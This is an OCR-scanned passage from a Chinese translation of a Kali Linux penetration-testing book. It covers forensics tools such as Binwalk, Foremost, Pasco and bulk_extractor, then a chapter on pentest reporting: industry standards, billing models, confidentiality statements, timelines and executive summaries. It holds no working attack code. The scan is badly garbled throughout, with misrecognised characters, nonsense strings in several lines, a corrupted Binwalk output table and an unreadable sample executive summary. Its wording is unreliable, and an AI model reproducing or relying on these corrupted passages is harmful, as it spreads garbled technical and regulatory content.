Binwalk 会 输出 该 二 进 制 文件 的 结 


HEX DESCRIPTION 


0x508 CFE boot loader, little endian 
0x10000 dcom 96345 firmware header, header size: 256, firmware version: "8", board id: “6348GW-16", 


60x10100 Squashfs filesystem, g endian, version 2.0, size: 26233 bytes, 420 inodes, blocksize: 65536 


0x34483E Sercomm firmware signature, version I +) & ontrol: 6, hardware ID: “DG834GT", hardware 
version: 6x4166, firmware version: 6x16, starting code segment: 6x68, code size: 0x7300 


前 面 的 截图 显示 , 管理 员 下 载 了 一 个 二 进 制 文件 并 对 其 进行 了 重 命名 , 使 其 看 起 来 更 像 是 来 
自 男 外 一 个 厂商 (FW_WRT54G 是 一 款 Linksys 路 由 硕 )。Binwalk 可 以 分 析 该 文件 并 警告 该 文件 是 
一 个 Sercom 的 固件 文件 ， 即 使 文件 被 重 命名 为 Linksys 格 式 。 


4. pdf-parser 


pdf-parser 用 来 解析 和 分 析 便 携 式 文件 格式 (PDF，Portable Document Format ) 的 文档 ， 以 及 
从 PDF 文 梢 中 提取 原始 信息 ， 如 代码 、 图 片 和 其 他 元 素 。 它 是 一 亚 用 来 检查 和 销毁 被 判 为 包含 恶 
意 代 人 码 的 PDF 文档 的 工具 。 


5. Foremost 


Foremost 是 一 个 数据 切 分 工具 ， 可 以 基于 文件 的 首部 、 尾 部 和 内 部 数据 结构 来 恢复 文件 。 
Foremost 可 以 用 于 映像 文件 ， 如 通过 aqa、Safeback 和 Encase 工 具 生成 的 映像 文件 ， 或 是 直接 用 于 
便 盘 。 映 像 文件 的 首部 和 尾部 可 以 通过 一 个 配置 文件 来 指定 ， 或 是 用 命令 行 来 识别 文件 的 类 型 。 
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这 些 内 建 类 型 会 查看 给 出 文件 格式 的 数据 结构 ， 从 而 允许 更 可 靠 、 更 快 的 恢复 动作 。 


6. Pasco 


Pasco 是 一 款 取 证 工具 ， 它 可 以 读 取 由 微软 的 正 创 建 的 index.dat 文 件 。index.dat 文 件 会 存储 用 
户 的 浏览 记录 ， 这 在 对 主机 进行 调查 时 非常 有 有 用。 微软 会 在 主机 系统 硬盘 中 的 各 种 位 置 存 储 
index.dat。 举 个 例子 ， 一 些 index.dat 文 件 是 在 用 户 的 主 目录 中 ， 用 以 保存 用 户 的 配置 信息 。 


Pasco 只 针对 IE 有 效 。 其 他 浏览 器 如 Firefox 和 Chrome 不 会 保留 index.dat 文 件 . 
Firefox 和 Chrome 会 将 浏览 器 信息 存储 到 SQLite 数 据 库 中 。 数 据 库 的 位 置 在 各 个 
操作 系统 中 都 不 相同 ,但 它们 可 以 通过 SQLite 数 据 库 查看 器 打开 查看 。 本 书 作 者 
喜欢 的 SQLite 客 尸 端 工具 之 一 是 一 款 Firefox 插 件 ， 名 为 SQLite Manager. 


7. Scalpel 
Scalpel E — KA FIDE, 用 于 搜索 已 知 文件 首部 和 尾部 签名 数据 库 、 答 试 从 硬盘 映像 文 


件 中 切 分 出 文件 。 你 可 以 用 你 要 定位 的 文件 类 型 来 对 scalpel.conf 文 件 进行 配置 ， 然 后 针对 某 个 数 
据 库 运行 该 工具 。 


8. bulk_extractor 


bulk_extractor 可 以 用 来 从 映像 文件 中 提取 各 种 内 容 , 包括 信用 卡号 、 手 机 号 、URL 和 电子 邮 
件 地 址 。bulk_extractor 也 可 以 通过 映像 文件 生成 单词 列表 ， 进 而 用 于 字典 攻击 。bulk_extractor 可 
能 要 运行 数 个 小 时 ,但 提取 出 来 的 数据 在 取证 中 的 作用 对 得 起 这 份 等 待 。 


7.8 小结 


商业 运营 中 的 一 些 资 源 至 关 重 要 , 而 自始至终 保障 这 些 资 源 的 安全 更 是 重 中 之 重 。 我们 之 所 
以 写 这 本 书 , 除了 想 为 渗透 测试 人 员 提 供 文 持 ， 更 布 望 教 给 谈 者 各 种 攻击 方法 。 因 为 恶意 用 户 可 
以 对 资源 进行 利用 , 所 以 管理 员 应 该 提高 安全 防御 水 准 。 每 个 人 都 是 一 个 被 攻击 的 目标 ,投入 多 
少时 间 和 资源 来 降低 被 利用 的 风险 取决 于 资源 所 有 者 。 

本 章 内 容 可 用 来 防御 前 几 章 介绍 的 攻击 。 你 可 以 将 前 几 章 介绍 的 工具 当成 验证 自己 系统 上 存 
在 漏洞 的 工具 。 本 章 介绍 的 内 容 包 括 如 何 克 隆 Web 应 用 以 避免 对 线 上 系统 进行 测试 、 基 线 安全 标 
准 ， 以 及 防御 前 儿 草 介绍 的 各 种 攻击 。 这 些 攻击 包括 密码 人 破解、 中 间 人 攻击 、SSL strip. DoS, 
Cookie 急 取 和 点 击 支 持 。 本 莉 还 专门 用 一 市 来 介绍 如 何 使 用 Kali Linux 进 行 数字 取证 调查 。 


下 一 章 我 们 将 介绍 交付 渗透 测试 服务 的 最 佳 方式 ， 包 括 开 发 专业 交付 成 果 的 各 种 方法 。 
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在 展开 本 章 内 容 前 , 我 们 想 先 说 明 一 下 , 本 章 内 容 涉及 的 主题 有 撰写 报告 、 设 定 条 球 和 协议 。 
我 们 应 当 将 这 些 例子 用 作 通 用 指导 方针 。 我 们 并 不 是 主张 只 掌握 符合 法 律 规定 的 知识 或 技术 。 虽 
然 我 们 的 Facebook 资 料 中 显示 有 7 个 都 是 律师 ， 而 且 是 电视 剧 《 波 士 顿 法 律 》 的 热心 观众 ， 但 我 
们 不 是 Denny Crane*。 当 需要 严肃 对 待 开发 范围 、 协 议和 报告 等 问题 时 ， 我 们 建议 你 寻求 专业 的 
AER 


网 络 工程 师 负 责 部 署 网 络 , 程序 员 负 责编 写 应 用 , 审计 员 负 责编 写 报告 。 作 为 网 络 渗透 测试 
人 员 ， 训 无 疑问 你 扮演 着 审计 员 的 角色 。 你 跟 负 责 配置 路 由 协议 的 网 络 工程 师 不 同 ， 跟 负责 编写 
应 用 的 程序 员 也 不 同 ， 你 的 价值 在 于 你 编写 的 报告 。 换 句 话 说 ,你 需要 学 习 如 何 编写 报告 。 有 一 
门 科 学 艺术 跟 写 作 是 关联 的 。 如 果 要 寻求 一 个 一 致 的 风格 , 本 书 作者 推荐 “The Modern Language 
Association of America Style" ( 美国 现代 语言 学 会 语 体 )， 即 广为人知 的 MLA。MLA 是 一 种 易于 
使 用 的 写作 语 体 , 也 是 大 多 数 高 中 学 校 所 要 求 的 写作 标准 。H. Ramsey Fowler 和 Jane E. Aaronit 
的 名 为 The Little, Brown Handbook ”的 参考 指南 ， 是 一 本 介绍 写作 时 如 何 正 确 使 用 MLA 语 体 的 专 
若 。 作 为 渗透 测试 人 员 , 并 且 最 终 有 可 能 是 审计 员 , 你 的 价值 都 取决 于 如 何 呈 现 上 自己 的 发 现 。 渗 
透 测试 报告 不 成 功 的 首要 原因 是 语法 或 拼写 错误 。 次 要 原因 是 不 合 逻 辑 的 流程 或 语 体 。 这 也 是 我 
们 强烈 建议 你 提前 让 跟 项 目 无 关 的 其 他 人 帮 你 审定 报告 ， 以 提供 劳 观 者 观点 的 原因 。 不 过 ,审定 
AN FEE EER 


你 如 何 呈 现 结果 是 对 将 来 业务 最 有 影响 力 和 决定 性 的 因 系 。 TEE SS PAA, 你 要 了 
解 一 些 跟 技 术 审计 相关 的 较为 恰当 的 语 体 和 流程 ， 其 中 包括 来 目 PCI 或 其 他 行业 组 织 制定 的 行业 
标准 ， 比 如 CoBIT 和 ITIL。 w, 报告 的 主题 应 该 符合 审计 服务 的 企业 进行 公司 治理 采用 的 标准 。 
同时 要 记得 渗透 测试 报告 会 过 很 多 人 的 手 , 也 可 能 会 在 超过 预期 的 很 长 一 段 时 间 内 被 很 乡 人 引用 。 


客户 希望 知道 他 们 的 系统 到 的 有 多 容易 被 攻击 , 以 及 修补 这 些 漏洞 的 需求 条 件 , 从 而 能 够 降 
低 整 体 遗 受 攻击 的 安全 风险 。 报告 的 格式 和 基调 会 引起 对 数据 的 正面 反应 或 负面 反应 。 与 漏洞 关 


4 波士顿 法 律 》 中 一 个 主角 的 名 字 ， 律 师 届 的 精英 。 一 一 编者 注 
D 原 书 第 9 版 的 中 文 版 《 李 特 -布朗 英文 写作 手册 〈 中 文 简 释 版 )》 由 北京 大 学 出 版 社 出 版 。 一 一 编者 注 
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联 的 ,可 能 是 某 些 职位 上 的 员工 被 辞退 。 当 然 ,， 也 可 能 一 个 严重 的 安全 汤 洞 因 报 告 没 有 恰当 地 突 
出 修复 该 问题 的 重要 性 而 被 忽略 。 那些 顶尖 的 服务 提供 商会 在 编写 执行 报告 时 ,从 业务 和 技术 优 
势 两 方面 做 权衡 ,使 最 终结 果 能 对 领导 层 和 技术 员工 产生 正面 影响 。 


一 个 比较 好 的 出 发 点 是 了 解 哪些 规定 、 标 准 和 法 令 对 客户 来 说 比较 重要 。 将 客户 的 需求 和 行 
业 标 准 结合 起 来 是 本 昔 的 第 一 个 主题 。 接 者 ， 我 们 会 看 一 下 用 于 主导 交付 服务 的 不 同 服务 模型 。 
之 后 , 我 们 会 关注 执行 报告 的 不 同类 型 的 文档 格式 ， 以 便 你 可 以 在 服务 的 后 续 流 程 中 给 客户 留 下 
一 个 比较 好 的 印象 。 本 章 将 会 以 一 些 示 例 报 告 结尾 ， 并 且 会 在 最 后 介绍 一 下 Kali Linux 中 可 用 的 
其 他 报告 工具 。 
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客户 手 里 只 有 有 限 的 预算 , 因此 , 他 们 通常 不 会 将 安全 作为 主动 投入 成 本 的 首选 对 象 。 根据 
我 们 的 经 验 ， 客户 会 完 将 经 费用 在 其 他 技术 领域 ,直到 出 现 一 些 问题 导 任 损失 ,这 时 才 会 调配 啊 
应 性 的 支出 。 许 多 客户 现 有 设施 中 就 已 存在 很 多 问题 需要 解决 , 而 他 们 同时 还 在 升级 系统 以 跟 上 
最 新 的 拉 术 发 展 ， 对 提供 评估 现 有 安全 状况 的 服务 一 一 如 渗透 测试 一 一 的 服务 提供 丙 来 说 , 这 时 
他 们 面 对 的 情况 要 复杂 得 多 。 一 个 类 似 的 情况 是 , 在 许多 人 购 天 笔记 本 电脑 时 ,他 们 会 顺便 考虑 
天 一 些 功 能 型 软件 ， 而 不 是 安全 防御 型 软件 〈 例 如 买 微软 的 Word 应 用 ， 而 不 是 杀毒 软件 )。 当 该 
笔记 本 电脑 用 了 一 段 时 间 感 染 了 病毒 时 , 用 户 才 会 暂 集 考虑 功能 型 软件 , 提高 购 入 安全 软件 以 删 
除 恶 意 应 用 的 优先 级 。 


提高 你 的 服务 在 客户 采购 中 优先 级 的 一 个 方法 是 将 其 跟 商 业 规定 看 齐 。 客 户 通 稍 更 倾 问 于 购 
买 用 来 使 其 符合 商业 责任 要 求 的 服务 , 这 样 比较 方便 他 们 跟 相 关 方 说 明 这 项 投入 的 意义 。 许 多 行 
业 都 对 未 通过 审计 的 情况 采取 了 严厉 措施 , 从 罚款 到 解雇 都 有 。 将 交付 的 结果 跟 标 准 规定 看 齐 是 
有 助 于 推广 服务 的 一 剂 强 心 针 。 


跟 行 业 规 范 相关 的 一 些 重要 术语 如 下 。 


口 基线 ”它们 主要 用 于 描绘 出 能 够 满足 政 末 要求 的 最 低 安 全 等 级 。 基 线 可 以 是 配置 、 架 构 
或 流程 ( 可 能 影响 也 可 能 不 影响 业务 流程 ,但 可 以 被 修改 以 满足 这 些 要 求 )。 你 可 以 将 基 
线 用 作 制 定 标 准 的 一 个 抽象 。 

口 标准 ”它们 是 用 于 支持 更 高 政策 要 求 的 强制 性 要 求 。 标 准 可 能 会 要 求 使 用 特定 的 技术 ， 
包括 品牌 、 产 品 和 协议 。 举 个 例 和 于， 基于 需要 有 某 种 形式 的 目 动 化 访问 控制 的 基线 ， 使 
用 思科 身份 服务 引擎 (Cisco Identity Services Engine ) 创建 一 个 针对 802.1x 的 标准 。 

D 指导 方针 ”它们 是 建议 性 质 的 ， 而 不 是 必需 的 。 你 可 以 将 指导 方针 看 成 与 标准 类 似 。 不 
过 ,没有 什么 会 强制 人 们 一 定名 守 它 们 。 例 如 ， 在 防火 墙 上 开放 哪些 问 口 做 一 些 控制 而 
不 是 开放 所 有 并 口 的 流量 。 
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8.2 行业 标准 


有 很 多 行业 标准 是 强制 客户 休 循 的 。 以 下 列表 第 用 于 说 明 筹 集资 金 的 产品 和 服务 是 符合 要 
求 的 。 


OQ 健康 保险 便利 和 责任 法 案 (HIPAA, Health Insurance Portability and Accountability Act) 
它 要 求 采 取 适 当 的 控制 ， 来 保证 医疗 保健 交易 记录 和 管理 信息 系统 能 够 保护 可 识别 个 体 
的 电子 健康 信息 。 不 符合 HIPAA 规 范 不 会 直接 导致 罚款 ， 不 过 会 有 一 些 附带 风险 ， 比 如 
不 符合 HIPAA 可 能 会 导致 民事 责任 或 品牌 受 损 。 

a 联邦 信息 处 理 标准 (FIPS, Federal Information Processing Standards) 它们 是 用 于 保 
护 由 政府 机 构 和 承包 商 发 送 的 信息 而 开发 的 美国 计算 机 安全 标准 。 

OQ 联邦 信息 安全 管理 法 案 (FISMA, Federal Information Security Management Act) 或 美 
国 国 家 标准 与 技术 研究 院 (NIST, National Institute of Standards and Technology, ) 
FISMA 和 NIST 专 门 出 版 物 800-153 和 800-137 定 义 了 一 个 基于 支持 联邦 运营 的 特定 资源 和 
固定 资产 来 保证 信息 安全 控制 有 效 性 的 框架 。 

口 北美 电力 可 靠 性 公司 (NERC, North American Electric Reliability Corporation) 它 制定 
了 标准 的 用 于 控制 或 影响 北美 大 电力 系统 可 靠 性 的 关键 基础 设施 保护 (CIP, Critical 
Infrastructure Protection )。 经 联邦 能 源 管理 委员 会 (FERC, Federal Energy Regulatory 
Commission ) 批准 ， 所 有 加 入 到 美国 国家 大 电网 的 组 织 都 必须 避 循 这 些 标准 。 

口 支付 卡 行业 数据 安全 标准 (PCI-DSS，Payment Card Industry Data Security Standard) 
和 支付 应 用 数据 安全 标准 (PA-DSS, Payment Application Data Security Standard) 这 
些 标准 是 为 那些 需要 人 处理 持 卡 人 信息 的 组 织 设立 的 ， 包括 那 些 处 理 主要 借 记 卡 、 信 用 卡 、 
预付 卡 、 电 子 钱包 、ATM 和 POS 卡 等 持 卡 人 信息 的 组 织 。 

口 萨 班 斯 -奥克斯 利 法 案 (SOX, Sarbanes-Oxley Act) 它 规定 了 严格 的 改革 措施 来 增强 企 
业 的 财务 公开 以 避免 账目 坎 诈 。 


8.3 ”专业 服务 


针对 服务 回 用户 收 取 费 用 最 稼 见 的 宋 略 有 一 站 式 方 案 法 以 及 计时 和 物料 法 。 一 站 式 方案 意味 
着 上 所 有 服务 的 费用 是 固定 的 , 只 有 在 客户 提出 了 约定 的 工作 范围 之 外 的 要 求 才 能 调整 。 通常 针对 
一 站 式 方案 提出 的 变更 要 求 提出 为 外 一 个 变更 请 求 , 只 有 当 客 户 先 接受 了 这 个 请 求 , 才能 将 额外 
费用 计 入 结算 账目 。 


一 站 式 服 务 对 服务 提供 商 来 次 有 利润 降低 的 风险 , 因为 在 规定 的 工作 范围 内 , 他 们 不 能 依据 
投入 的 劳动 量 而 动态 调整 收费 价格 。 这 也 意味 看 服务 提供 商 有 可 能 按 相当 于 利润 增加 的 预期 时 间 
完成 任务 。 这 也 可 能 在 服务 超过 筋 动 成 本 时 出 现 逆 火 现 象 。 因 此, 一 定 要 在 为 预期 服务 制定 工作 
汇 围 时 预 留 一 些 空 犁 时 间 ， 以 便 处 理 未 预见 的 突 发 事件 。 
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而 客户 也 会 因 规划 预期 成 本 的 能 力 制约 , LR] EA FH — P IRA KP ETE BOR IHR 
达到 预期 结案 ,同时 在 任务 未 完成 时 督促 服务 提供 两 为 结 末 人 负责 ， 而 不 至 于 增加 额外 成 本 。 一些 
如 美国 联邦 政府 等 的 大 组 织 , 通常 都 会 针对 一 站 式 服务 发 布 正式 的 公开 询 价 CREP, Requests for 
Pricing )。 大 多 数 情 况 下 ， 采 购 部 门 会 有 成 型 的 指导 方针 来 根据 各 种 因 系 ( 如 价值 最 品 、 价 格 最 
优 和 符合 要 求 的 条 目 等 ) 判定 应 该 雇用 哪 家 服务 提供 商 。 我 们 遇 到 过 一 些 采 购 部 分 只 根据 价格 最 
优选 择 服 务 而 出 现 询 价 逆 火 的 情况 。 有 些 情 况 下 ， 粳 糕 的 服务 会 市 来 更 多 的 问题 ， 从 而 导致 花费 
儿 倍 于 前 面 价值 最 高 方 宁 的 成 本 来 修复 这 些 问题 。 要 帮助 客户 避免 这 种 情况 , 我 们 建议 跟 客 户 一 
起 商讨 如 何 要 求 上 只 有 特定 资质 的 服务 提供 商 才 能 达成 的 具体 条 球 , 以 及 只 有 特定 资质 的 服务 提供 
商 才 能 满足 的 条 件 ， 这 样 才 能 在 价值 最 高 和 价格 最 优 之 间 找 到 一 个 可 衡量 的 平衡 矩阵 。 


为 一 种 收费 方法 是 计时 和 物料 法 。 计 时 和 物料 法 在 询 价 时 会 按 占 用 的 时 间 来 计 旨 。 通 肖 , 服 
务 提供 商会 针对 计 费 全 上 略 列 出 不 同 的 单位 时 间 费 凌 ， 比 如 项 目 经 理 一 小 时 费 率 是 100 美 元 ， 而 高 
级 工程 师 是 一 小 时 是 200 美 元 。 一 般 来 说 ， 服 务 会 被 拆 成 按 预 期 时 间 划 分 的 任务 ， 以 此 来 帮助 客 
户 准 备 在 项 目 进 行 时 要 文 付 的 费用 。 


计时 和 物料 法 会 将 高 成 本 服务 的 风险 转移 给 客户 , 因为 超出 任务 列表 的 服务 依然 要 计 费 ,对 
客户 有 利 的 地 方 是 如 和 东 他 们 能 完成 其 中 部 分 工作 , 那么 就 能 节省 一 些 文 出 ,同时 还 能 避免 一 站 式 
服务 中 津 见 的 额外 填充 时 间 。 对 客户 来 说 有 一 个 缺点 ,这 样 服务 提供 两 没有 动力 尽早 完成 该 项 目 ， 
因而 可 能 会 推迟 完成 时 间 。 

我 们 建议 专业 服务 提供 商 在 实践 时 将 目标 设 为 开发 一 站 式 服务 .定义 精确 的 实践 会 跟 客 户 设 
定 合理 的 期 望 ， 从 而 避免 服务 不 满足 工作 范 于 设 定 。 以 我 们 的 经 验 ,客户 是 不 会 给 你 开 一 张 空 日 
文 票 供 你 随意 计 费 ， 而 是 会 在 申请 预算 前 要 求 你 提供 一 个 固定 成 本 预算 。 


时 不 时 地 ， 客 户 会 要 求 将 服务 商 这 边 的 可 计 费 成 员 替 换 为 他 们 自己 的 员工 
来 降低 整个 项 目的 成 本 。 攻 个 例子 ， 客 户 可 能 会 要 求 用 内 部 项 目 经 理 来 规划 项 

ASN 。 目 。 这 样 就 引入 了 不 能 合理 管理 资源 的 风险 ， 并 可 能 因此 导致 一 些 问题 ， 或 造 
成 额外 的 时 间 开 销 ， 以 至 于 吞噬 掉 预 期 的 利润 。 我 们 建议 避免 这 些 情况 ， 因 为 
你 很 难 控制 一 个 不 直接 隶属 于 你 们 团队 的 成 员 。 


8.4 ”文档 


完成 一 个 可 交付 结果 需要 经 历 一些 步 又 ,如 下 图 所 示 。 第 一 步 是 项 目 评审 。 在 这 个 环节 中 服 
务 提供 商会 评审 工作 说 明 书 、 客 户 商业 目标 、 需 要 贰 酌 的 地 方 以 及 预期 能 提供 的 价值 。 所 有 这 些 
再 加 上 一 些 和 额外 的 可 引起 共鸣 的 材料 ， 就 构成 了 一 个 报告 模板 。 
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E» 信息 收集 > 第 一 版 草稿 > 审定 并 完成 > 


下 一 步 是 在 信息 收集 环 市 填写 报告 模板 。 收 集 到 的 信息 包括 识别 的 设备 、 采 用 的 流程 、 发 现 
的 漏洞 、 漏 洞 的 验证 、 建 议 的 修复 以 及 其 他 数据 。 


在 所 有 数据 被 收集 并 跟 模 板 对 齐 后 , 第 三 步 是 准备 第 一 版 草稿 。 这 份 草 稿 不 会 是 呈现 在 客户 
面前 的 那 份 , 它 包 含 了 尽 可 能 多 的 信息 。 最 后 一 步 是 审定 过 程 , 将 报告 精简 到 只 包含 最 可 靠 的 数 
Hi, 以 及 对 系统 做 哪些 调整 可 以 满足 业务 需要 。 最 佳 实践 是 让 专业 技术 人 员 和 专业 写作 人 员 一 起 
编辑 这 份 草稿 ， 保 证 其 既 能 满足 业务 运营 需求 ， 又 能 满足 技术 人 员 的 需求 。 


你 制定 的 工作 范围 一 定 要 包含 创建 文档 所 需 的 时 间 。 通 常 报告 写作 时 间 中 
CAN 60% 的 时 间 都 用 于 完成 初稿 , 文档 审定 以 及 项 目 交 付 会 占用 剩 下 的 时 间 。 你 要 确 
保 将 文档 生命 周期 计 入 项 目 时 间 表 来 避免 收益 受 损 。 


8.5 ”报告 格式 


不 管 是 什么 类 型 的 项 目 , 有 些 内 容 一 定 要 加 到 服务 的 交付 文档 中 。 所 有 文档 都 应 该 说 明 它 们 
的 目的 ， 并 对 品牌 做 一 定 推 广 ， 说明 涉及 的 各 方 ， 列 出 进行 过 的 操作 ， 并 以 期 望 结 末 结 尾 。 本 市 
将 会 提供 一 些 指导 和 例子 ,来 说 明 如 何 非 第 专业 地 满足 格式 要 求 。 


8.5.1 封面 页 


封面 页 至 少 要 提供 报告 名 、 版 本 、 日 期 、 作 者 、 服 务 提供 商 名 称 以 及 目标 和 群体。 封面 页 也 可 
以 列 出 其 他 项 ， 比 如 文档 安全 归 类 ， 或 是 突出 其 他 方 的 结果 。 


8.5.2 ”保密 声明 


大 多 数 渗 透 测 试 中 获得 的 都 是 比较 敏感 的 信息 。 所 以 通过 制定 安全 等 级 来 保护 执行 过 程 中 收 
集 到 的 信息 至 关 重 要 , 说 明 人 允许 谁 查看 这 类 数据 也 很 重要 。 这 里 我 们 可 能 需要 一 些 特殊 等 级 的 批 
AE, 对 数据 做 特殊 处 理 或 是 将 其 存放 到 做 过 安全 加 固 的 地 方 ， 比 如 将 分 类 材料 存储 到 敏感 信息 隔 
离 设 施 (SCIF, Sensitive Compartmented Information Facility ) 中 。 汇 漏 数 据 可 能 会 造成 财务 上 、 
品牌 上 和 法 律 上 的 不 恨 后 末 。 
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保密 声明 应 该 说 明 给 予 文 档 什么 等 级 的 安全 保护 、 谁 可 以 查看 这 些 资 料 、 哪 些 内 容 是 允许 复 
制 的 、 哪 些 是 不 允许 复制 的 、 分 发 的 权限 以 及 其 他 法 律 文案 。 我 们 建议 最 好 请 一 位 有 法 律 背 景 的 
人 士 来 带 你 制定 标准 的 你 密 声 明 。 


示例 一 : 保密 声明 


本 文档 包含 来 目 服务 提供 商 的 涉 密 和 特权 信息 。 这 类 信息 仅 供 客户 独家 使 用 , 用 于 评估 企业 
内 部 当前 的 信息 安全 状况 。 接 受 此 文档 ,说明 客 户 同意 将 本 文档 的 内 容 保 密 ， 并 且 不 会 复制 、 汇 
泼 或 是 分 发 给 第 三 方 ， 除了 将 来 按照 文档 的 推荐 直接 为 客户 提供 服务 和 (或 ) 产品 的 企业 。 他 们 
不 需要 问 服务 提供 商 发 出 书面 请 求 或 书面 确认 。 如 果 你 不 是 目标 接收 入, 请 注意 汇源 、 复 制 或 分 
发 本 文档 或 其 中 内 容 都 是 不 被 允许 的 。 


示例 二 : 保密 声明 


本 保密 信息 是 作为 服务 提供 商 咨询 活动 的 交付 结果 , 提供 给 客户 的 。 此 文档 的 唯一 目的 是 辐 
客户 提供 本 次 测试 的 结 末 和 建议 。 各 个 参 扎 人 都 同意 根据 咨询 代理 和 服务 提供 商 之 间 的 协议 , 严 
格 针 守 分 发 限制 。 


8.5.3 ”文档 控制 


列 出 当前 是 什么 版 本 以 及 做 过 哪些 修改 对 于 交付 目标 很 重要 。 很 多 情况 下 , 文档 是 由 许多 具 
备 各 种 技能 的 人 来 审定 的 。 标 出 修改 发 生 的 日 期 和 修改 类 型 可 以 帮助 阅读 对 象 找到 最 新 版 本 。 


x 档 修订 记录 。 | | 


à 
E 
s 


8.5.4 时 间 表 


时 间 表 为 项 目的 各 个 环 市 提供 了 一 个 预 佑 的 时 间 。 时 间 表 应 该 包括 环 市 名 称 、 要 完成 的 任 
F, 以 及 该 环 市 预期 持续 的 时 间 。 通 党 ,持续 时 间 会 以 可 计 费 时 间 来 显示 ， 所 以 客户 可 以 评 售 该 
项 目 各 个 环节 的 成 本 。 我 们 建议 你 在 文案 中 标明 哪些 环节 是 必须 要 有 的 ,以 免 在 项 目 局 动 后 删 掉 
STREET 

下 面 是 一 份 预期 的 时 间 表 以 及 整体 的 实施 方案 。 


服务 提供 商会 在 收 到 工作 说 明 书 (SOW, Statement of Work ) 之 后 的 两 周 内 开始 局 动 测试 活 au 
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ON, 并 由 客户 来 文 付 跟 资 源 可 用 性 相关 的 采购 。 如 果 客 户 要 求 提前 测试 活动 开始 的 日 期 , 那 这 必 
须 跟 服务 提供 商 、 项 目 管理 团队 和 财务 团队 一 起 议定 。 


项 目 局 动 环节 和 修复 演示 环节 对 于 所 有 其 他 环节 来 资 守 是 标准 环节 。 


EE ED HUBER 


项 目 启动 会 审定 工作 说 明 书 
可 交付 配置 
业务 和 技术 文档 ， 边 界 评审 
先决 条 件 
网 络 评估 工具 维 备 和 安装 
IER PRL a BT 
策略 审定 、 上 映射 16 小 时 


扫描 设备 
评审 已 有 网 络 染 构 32 小 时 


找 出 能 被 漏洞 利用 的 系统 并 在 目标 系 
统 上 执行 诊 透 测试 32 小 时 


报告 分 析 、 推 荐 和 演示 16 小 时 


演示 发 现 的 结果 和 安全 影响 分 析 ， 包 
括 修复 


项 目 结束 


8.5.5 执行 总 结 


执行 报告 的 目的 是 给 为 什么 要 执行 渗透 测试 服务 提供 一 个 宏观 的 上 下 文 ,执行 总 结 应 该 包括 
导致 已 有 问题 的 原因 、 问题 的 严重 程度 分 析 以 及 能 达到 期 望 结果 的 修复 建议 。 执行 报告 不 需要 包 
含 扩 术 细节 ， 应 该 面 癌 领导 而 不 是 技术 员工 。 

示例 1: 执行 总 结 


Ab SE 
AR: 


E P EHR RRAN H SE CARS BT PP RS I TA 10€ EE H EA A 
JR Zea TE A DU TA T YE HA BP 9928 RIZR SCPE eA ile, 从 而 评估 客户 网 络 和 系统 的 
安全 性 。 本 项 目 是 由 来 目 服 务 提供 商 的 专家 于 必用 日 期 在 客户 内 网 中 的 奉 干 系统 上 完成 的 。 


本 项 目 包括 对 9 台 内 部 主机 进行 的 渗透 测试 。 在 测试 方面 ， 服 务 提供 商 主 要 关注 以 下 内 容 : 
a 答 试 判定 可 以 找 出 和 利用 哪些 系统 级 漏洞 ， 而 事先 对 该 环境 训 无 了 解 ， 也 未 通知 管理 员 ; 
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a 尝试 利用 找到 的 漏洞 ， 访 问 可 能 保存 在 系统 中 的 保密 信息 ; 
口 记录 和 报告 所 有 发 现 的 内 容 。 


所 有 测试 痢 是 围绕 春 这 些 系统 承载 的 实际 业务 流程 以 及 光 在 威胁 展开 的 。 因 此, 这 项 评估 的 
结 朵 反映 了 对 于 线 上 联网 淋 客 来 婉 ， 系 统 雄 露 程度 的 实景 图 。 


本 文档 包含 该 评估 的 结 

项 E] 信 息 

本 评估 的 主要 目的 是 针对 客户 网 络 和 系统 中 存在 的 安全 漏洞 进行 分 析 。 本 评估 的 过 程 主要 是 
找 出 潜在 漏洞 并 给 出 修复 漏洞 的 可 行 的 建议 ， 以 便 为 环境 提供 更 高 层级 的 安全 。 

服务 提供 商用 其 经 过 考验 的 渗透 测试 方法 来 评估 系统 的 安全 并 找 出 潜在 安全 汤 洞 。 

客户 雇用 服务 提供 商 来 在 网 络 中 一 定数 量 的 系统 上 进行 网 络 渗透 测试 ,这 些 系统 可 以 通过 主 
机 卫 地 址 192.168.1.X、10.1.1.X 以 及 172.16.1.X 来 标识 。 本 次 雇用 关系 的 目的 是 找 出 指定 系统 中 
的 安全 漏洞 ， 并 对 其 进行 优先 级 设 定 。 雇 用 关系 于 开始 日 期 开始 ,包含 4 天 的 测试 、 分 析 和 文档 
记录 。 


8.5.6 万 法 论 


我 们 建议 你 提供 一 个 你 是 如 何 交 付 服务 的 全 景 图 。 可 着 重 说 明 你 在 约定 的 各 个 阶段 的 进度 、 
使 用 的 工具 以 及 你 如 何 应 对 发 现 的 安全 威胁 。 通 津 我 们 会 制作 一 些 图 表 来 演示 进程 流 和 支撑 本 市 
内 容 结构 的 资源 。 


认证 可 以 帮助 服务 提供 黄玉 证 明 目 己 具备 提供 高 质 服务 的 能 力 。 有 些 证 书 可 以 用 来 突出 公司 
遵循 特定 方法 来 设 定 业 务 流程 的 能 力 ， 比 如 国际 标准 化 组 织 ( ISO ) 的 各 种 认证 ( 如 ISO 9001 或 
ISO 14001 )。 其 他 认证 可 以 主要 特定 技术 ， 比 如 让 工程 师 获 得 要 部 署 的 技术 的 认证 。 常 见 的 渗透 
测试 认证 有 道德 黑客 资格 认证 (CEH, Certified Ethical Hacker ) 和 GIAC 渗 透 测 试 员 认证 ( GPEN, 
GIAC Penetration Tester )， 它 们 能 够 帮 客 户 确 认 正 在 签约 阶段 的 服务 提供 商 是 否 具 备 资 质 。 


举 个 例子 : 方法 论 


服务 提供 商会 从 黑客 的 角度 , 基于 目 定 制 及 公开 的 工具 来 观察 当前 的 网 络 安全 状态 。 这 些 方 
法 可 以 帮 客 户 理解 威胁 信息 安全 的 风险 , 以 及 当前 这 些 保护 重要 系统 的 安全 控制 措施 的 优势 和 不 
足 。 这 些 结 采 可 以 通过 使 用 公开 信息 来 对 客户 的 内 部 网 络 进行 性 能 数据 分 析 、 映 射 网 络 结构 图 、 
找 出 主机 和 服务 、 枚 举 网 络 和 系统 层 漏洞 、 检 测 局 域 网 内 的 异 稼 主机 以 及 消除 扫描 过 程 中 出 现 的 
假 阳 性 。 


渗透 测试 方法 论 


对 目标 进行 锁定 


8.5.7 ”详细 测试 流程 


本 市 将 介绍 服务 约定 的 细 市 。 目标 受 众 通 肖 为 拉 术 员工 。 这 份 文档 的 目的 是 围绕 找 出 有 问题 
的 地 方 提供 尽 可 能 多 的 信息 。 客户 可 能 会 去 针对 某 个 突出 的 问题 进行 验证 , 重复 执行 文档 中 用 来 
